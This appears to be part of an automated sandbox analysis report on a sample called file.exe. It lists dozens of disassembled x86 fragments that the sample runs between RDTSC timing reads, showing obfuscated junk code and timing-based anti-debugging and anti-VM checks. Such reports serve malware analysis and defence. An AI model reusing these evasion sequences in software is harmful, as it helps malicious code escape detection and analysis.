Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796C9E second address: 796CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797AF9 second address: 797B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F66E8C719D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797B04 second address: 797B16 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66E8838CE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798AA1 second address: 798AA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A994 second address: 79AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F66E8838CE6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 mov si, 5056h 0x00000014 mov esi, 1023C876h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F66E8838CE8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 call 00007F66E8838CF8h 0x0000003b sub dword ptr [ebp+122D369Bh], edx 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+122D28C5h] 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c jns 00007F66E8838CECh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA05 second address: 79AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E7h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66E8C719E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA3D second address: 79AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799A87 second address: 799AFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F66E8C719D8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov di, 4FF8h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor ebx, 45ED9747h 0x0000003e mov eax, dword ptr [ebp+122D0FA1h] 0x00000044 mov dword ptr [ebp+122D2E01h], eax 0x0000004a push FFFFFFFFh 0x0000004c sub ebx, 44F1633Eh 0x00000052 nop 0x00000053 pushad 0x00000054 jmp 00007F66E8C719E9h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799AFD second address: 799B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA41 second address: 79AA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F66E8C719DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BA6B second address: 79BA79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BA79 second address: 79BA83 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BA83 second address: 79BB14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8838CE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F66E8838CF2h 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 xor dword ptr [ebp+122D195Eh], ebx 0x00000019 mov esi, dword ptr [ebp+122D2865h] 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F66E8838CE8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c xor ebx, dword ptr [ebp+122D36BDh] 0x00000042 jmp 00007F66E8838CEDh 0x00000047 xchg eax, esi 0x00000048 js 00007F66E8838CFAh 0x0000004e jmp 00007F66E8838CF4h 0x00000053 push eax 0x00000054 pushad 0x00000055 jo 00007F66E8838CE8h 0x0000005b pushad 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CAD6 second address: 79CAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F66E8C719E5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E0E second address: 750E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EEE second address: 7A1EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EF2 second address: 7A1F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jno 00007F66E8838CEAh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F66E8838CE8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov bh, 1Ah 0x0000002e mov bx, ax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F66E8838CE8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d xchg eax, esi 0x0000004e jmp 00007F66E8838CF1h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F66E8838CECh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2E21 second address: 7A2E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7AF2 second address: 7A7AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB5C second address: 79DB85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F66E8C719D8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jns 00007F66E8C719D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB85 second address: 79DB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB8A second address: 79DB94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8C719DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB94 second address: 79DBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F66E8838CF3h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 call 00007F66E8838CF4h 0x00000018 movzx ebx, dx 0x0000001b pop ebx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, 390Fh 0x00000027 mov eax, dword ptr [ebp+122D0EB9h] 0x0000002d mov dword ptr [ebp+122D207Ch], eax 0x00000033 push FFFFFFFFh 0x00000035 xor dword ptr [ebp+122D225Bh], esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A017B second address: 7A0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0181 second address: 7A0194 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F66E8838CF0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4145 second address: 7A414F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A414F second address: 7A4153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADA03 second address: 7ADA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F66E8C719E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4DEE second address: 7B4E14 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push esi 0x0000000c jng 00007F66E8838CE6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F66E8838CF1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4E14 second address: 5DC84F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F66E8C719E2h 0x00000014 pop eax 0x00000015 clc 0x00000016 cld 0x00000017 push dword ptr [ebp+122D0531h] 0x0000001d jmp 00007F66E8C719DEh 0x00000022 cmc 0x00000023 call dword ptr [ebp+122D33BFh] 0x00000029 pushad 0x0000002a pushad 0x0000002b or si, A32Ah 0x00000030 mov bl, 31h 0x00000032 popad 0x00000033 clc 0x00000034 xor eax, eax 0x00000036 jmp 00007F66E8C719DBh 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f sub dword ptr [ebp+122D3684h], eax 0x00000045 mov dword ptr [ebp+122D27F1h], eax 0x0000004b jmp 00007F66E8C719E5h 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 jmp 00007F66E8C719DBh 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f or dword ptr [ebp+122D1E34h], esi 0x00000065 lodsw 0x00000067 jmp 00007F66E8C719DBh 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 pushad 0x00000071 cld 0x00000072 xor edx, 5F6BDCC1h 0x00000078 popad 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jns 00007F66E8C719DCh 0x00000083 mov dword ptr [ebp+122D3409h], ecx 0x00000089 nop 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d push edi 0x0000008e pop edi 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAECE second address: 7BAEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007F66E8838CE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C4C second address: 7B9C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C50 second address: 7B9C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C5A second address: 7B9C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C60 second address: 7B9C76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BABDE second address: 7BAC2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F66E8C719E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F66E8C719D6h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F66E8C719DAh 0x0000001d popad 0x0000001e popad 0x0000001f jo 00007F66E8C719F2h 0x00000025 jmp 00007F66E8C719DCh 0x0000002a pushad 0x0000002b jnc 00007F66E8C719D6h 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDF12 second address: 7BDF16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDF16 second address: 7BDF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnl 00007F66E8C719D6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F66E8C719DEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDF3A second address: 7BDF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDF3E second address: 7BDF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDF4A second address: 7BDF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4897 second address: 7C489C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788004 second address: 78805E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F66E8838CE8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D33E1h] 0x00000029 call 00007F66E8838CF3h 0x0000002e pushad 0x0000002f jo 00007F66E8838CE6h 0x00000035 push eax 0x00000036 pop ebx 0x00000037 popad 0x00000038 pop edi 0x00000039 lea eax, dword ptr [ebp+1247ED45h] 0x0000003f mov edx, dword ptr [ebp+122D2E52h] 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78805E second address: 788064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788064 second address: 788072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F66E8838CE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788072 second address: 76FAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D3675h], eax 0x0000000f call dword ptr [ebp+122D2B7Ah] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7881E0 second address: 7881F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7881F2 second address: 7881F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7881F8 second address: 7881FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7885A7 second address: 5DC84F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d adc cx, 0B63h 0x00000012 push dword ptr [ebp+122D0531h] 0x00000018 jmp 00007F66E8C719DCh 0x0000001d call dword ptr [ebp+122D33BFh] 0x00000023 pushad 0x00000024 pushad 0x00000025 or si, A32Ah 0x0000002a mov bl, 31h 0x0000002c popad 0x0000002d clc 0x0000002e xor eax, eax 0x00000030 jmp 00007F66E8C719DBh 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D3684h], eax 0x0000003f mov dword ptr [ebp+122D27F1h], eax 0x00000045 jmp 00007F66E8C719E5h 0x0000004a mov esi, 0000003Ch 0x0000004f stc 0x00000050 jmp 00007F66E8C719DBh 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 or dword ptr [ebp+122D1E34h], esi 0x0000005f lodsw 0x00000061 jmp 00007F66E8C719DBh 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a pushad 0x0000006b cld 0x0000006c xor edx, 5F6BDCC1h 0x00000072 popad 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 jns 00007F66E8C719DCh 0x0000007d mov dword ptr [ebp+122D3409h], ecx 0x00000083 nop 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 push edi 0x00000088 pop edi 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788805 second address: 78882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66E8838CECh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78882F second address: 788833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78896F second address: 788973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788973 second address: 788998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F66E8C719DEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F66E8C719D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788998 second address: 7889A2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7889A2 second address: 7889BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8C719E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788BFA second address: 788BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788BFE second address: 788C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F66E8C719DCh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788C16 second address: 788C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F66E8838CE6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F66E8838CE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1A91h], esi 0x0000002d push 00000004h 0x0000002f jng 00007F66E8838CF2h 0x00000035 jl 00007F66E8838CECh 0x0000003b sub edi, dword ptr [ebp+122D2939h] 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F66E8838CEBh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788C6F second address: 788C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788C75 second address: 788C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788C7A second address: 788CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CA0 second address: 788CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CA4 second address: 788CB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789129 second address: 7891A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66E8838CE6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F66E8838CE8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jnc 00007F66E8838CE6h 0x0000002f push 0000001Eh 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F66E8838CE8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov dx, bx 0x0000004e nop 0x0000004f jbe 00007F66E8838CEEh 0x00000055 push edi 0x00000056 jp 00007F66E8838CE6h 0x0000005c pop edi 0x0000005d push eax 0x0000005e pushad 0x0000005f jg 00007F66E8838CE8h 0x00000065 push eax 0x00000066 push edx 0x00000067 jne 00007F66E8838CE6h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7895B6 second address: 78961E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 nop 0x00000012 jl 00007F66E8C719D6h 0x00000018 lea eax, dword ptr [ebp+1247ED45h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F66E8C719D8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 jmp 00007F66E8C719E4h 0x0000003d mov cl, DCh 0x0000003f jne 00007F66E8C719DCh 0x00000045 push eax 0x00000046 jnp 00007F66E8C719E4h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
